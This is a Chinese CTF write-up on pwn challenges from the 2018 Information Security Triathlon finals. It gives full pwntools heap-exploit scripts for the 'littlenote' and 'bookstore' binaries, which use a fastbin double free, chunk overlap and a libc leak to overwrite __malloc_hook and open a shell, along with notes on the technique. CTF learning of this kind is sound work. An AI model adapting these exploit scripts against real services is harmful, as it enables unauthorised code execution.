信息安全铁人三项赛真题解析_对[CrackMe]【ctf】2018信息安全铁人三项赛个人赛总决赛赛题分享的一些补充...

原贴主地址:https://www.52pojie.cn/thread-837939-1-1.html

littenote这道题的exp

#------------------------------------------------------------------------------------------------------------------------------------

from pwn import *

io&＃61;process(&＃39;./littlenote&＃39;)

#context(os&＃61;&＃39;linux&＃39;,arch&＃61;&＃39;amd64&＃39;,log_level&＃61;&＃39;debug&＃39;)

def add(content,choose):

io.sendline(&＃39;1&＃39;)

io.recvuntil(&＃39;Enter your note\n&＃39;)

io.send(content)

io.recvuntil(&＃39;Want to keep your note?\n&＃39;)

io.sendline(choose)

io.recvuntil(&＃39;Done\n&＃39;)

def show(index):

io.sendline(&＃39;2&＃39;)

io.recvuntil(&＃39;Which note do you want to show?\n&＃39;)

io.sendline(str(index))

return (io.recvuntil("\nDone\n"))[:-6]

def free(index):

io.sendline(&＃39;3&＃39;)

io.recvuntil(&＃39;Which note do you want to delete?\n&＃39;)

io.sendline(str(index))

io.recvuntil(&＃39;Done\n&＃39;)

def main():

add(&＃39;\x00&＃39;*0x58&＃43;p64(0x71),&＃39;Y&＃39;)

add(&＃39;a&＃39;,&＃39;Y&＃39;)

add((p64(0x0)&＃43;p64(0x21))*6,&＃39;Y&＃39;)

free(1)

free(0)

free(1)

#pause()

heap_base&＃61;u64((show(0)).ljust(8,&＃39;\x00&＃39;))-0x70

print "heap_base -> " &＃43; hex(heap_base)

#pause()

add(p64(heap_base&＃43;0x60),&＃39;Y&＃39;) # !

add(&＃39;\x00&＃39;*0x58&＃43;p64(0x71),&＃39;Y&＃39;)

add(&＃39;\x00&＃39;*8&＃43;p64(0x81),&＃39;Y&＃39;)

add(&＃39;\x00&＃39;*8&＃43;p64(0xA1),&＃39;Y&＃39;)

#pause()

free(1)

libc_base&＃61;u64((show(1)).ljust(8,&＃39;\x00&＃39;))-0x68-0x00000000003C4B10

print "libc_base -> " &＃43; hex(libc_base)

one_gadget&＃61;libc_base&＃43;0xf02a4 # change

print "one_gadget -> " &＃43; hex(one_gadget)

add(&＃39;a&＃39;,&＃39;Y&＃39;) # 7

add(&＃39;a&＃39;,&＃39;Y&＃39;) # 8

add(&＃39;a&＃39;,&＃39;Y&＃39;) # 9

free(7)

free(8)

free(7)

point&＃61;libc_base&＃43;0x3c4af5-8

add(p64(point),&＃39;Y&＃39;) # 10

add(&＃39;a&＃39;,&＃39;Y&＃39;) # 11

add(p64(point),&＃39;Y&＃39;) # 12

#pause()

add(&＃39;a&＃39;*19&＃43;p64(one_gadget),&＃39;Y&＃39;)

io.sendline(&＃39;1&＃39;)

io.interactive()

main()

#------------------------------------------------------------------------------------------------------------------------------------

这道题就是个chunk extend/overlapping,通过extend/overlapping来修改一些已经malloc的chunk的size域为small chunk而不属于fast chunk的范围,从而导致free该chunk的时候被放入unsorted bin,从而可以leak出libc地址跟计算出one_gadget的地址,进而修改fd指针指向__malloc_hook的附近的位置.从而控制程序执行流获得一个shell.

bookstore这道题有意思的多.

附上原帖贴主的exp

#------------------------------------------------------------------------------------------------------------------------------------

#!/usr/bin/env python

# -*- coding: UTF-8 -*-

# imports

from pwn import *

import time

import os

import sys

elf &＃61; ""

libc &＃61; ""

env &＃61; ""

LOCAL &＃61; 1

context.log_level &＃61; "debug"

p &＃61; process("./bookstore", env&＃61;{"LD_PRELOAD":"/tmp/ironthree/book/libc_64.so"})

#p &＃61; remote("ip", port) #uncomment this.

p.recvuntil("choice:\n")

def add(name, length, book):

p.sendline("1")

p.recvuntil("name?\n")

p.send(name)

p.recvuntil("name?\n")

p.sendline(str(length))

p.recvuntil("book?\n")

p.send(book)

p.recvuntil("choice:\n")

def sell(idx):

p.sendline("2")

p.recvuntil("sell?\n")

p.sendline(str(idx))

p.recvuntil("choice:\n")

def read(idx):

p.sendline("3")

p.recvuntil("sell?\n")

p.sendline(str(idx))

data &＃61; p.recvuntil("choice:\n")

return data

add("1234567\n", 0, "a\n")

for i in range(4):

add("12345678\n", 0x50, "a\n")

add("aaaadddd\n", 0, "a\n") #7

add("bbbbcccc\n", 0x40, "a\n") #8

add("railser\n", 0, "b\n")

add("ddaa\n", 0x50, "b\n")

add("ddaa\n", 0x20, "b\n")

add("ddaa\n", 0x30, "b\n")

add("ddaa\n", 0x40, "b\n")

add("ddaa\n", 0x50, "b\n")

sell(0)

add("trytry\n", 0, "a" * 24 &＃43; p64(0xc1)&＃43;"\n") #overflow

sell(1)

add("a" * 16 &＃43; p64(0x6e)&＃43;"\n", 20, "x"*8&＃43;"\n")

data &＃61; read(1)

libc_addr &＃61; data.split("x"*8)[1][:6]

libc &＃61; u64(libc_addr &＃43; "\0\0") - 0x3c4c28

print hex(libc)

one &＃61; libc &＃43; 0x4526a

mallochook &＃61; libc &＃43; 0x3c4b10 - 0x10

target &＃61; libc &＃43; 0x3c4b38

#gogo

sell(5)

sell(6)

add("a"*30, 0, "a" * 24 &＃43; p64(0x51)&＃43;p64(0x6f)&＃43;"\n")

add("a"*30 ,0x40, "a\n")

sell(7)

sell(8)

add("a"*30, 0, "a"*24 &＃43; p64(0x61)&＃43;p64(target) &＃43; "\n")

add("a" * 30, 0x50, "a\n")

add("a"*30, 0x50, p64(0) * 6 &＃43; p64(mallochook) &＃43; "\n")

add("a"*30, 0x50, "a"*0x30&＃43;"\n")

add("a"*30, 0x50, p64(one) &＃43; "a"*0x30&＃43;"\n")

p.sendline("1")

p.sendline("xxxx")

p.sendline("30")

p.interactive()

#------------------------------------------------------------------------------------------------------------------------------------

拿到这道题我早就可以修改fd指针的.不过因为程序对malloc的大小有限制所以导致不知道下一步要怎么办,尝试过malloc 2 stack,不过stack上也没有合适的size,所以就卡住了,直到看到了原帖贴主的exp,他的思路是通过修改free的fast chunk的fd指针,从而可以控制fastbin来伪造size,进而可以修改别的free的chunk的fd来指向这个我们伪造的size,进而控制top chunk的指针,从而malloc 2 __malloc_hook,这种思路第一次看到!

至于myhouse这题,还没看...

有师傅学pwn的可以交流交流!

这几道题目可以在原帖下载!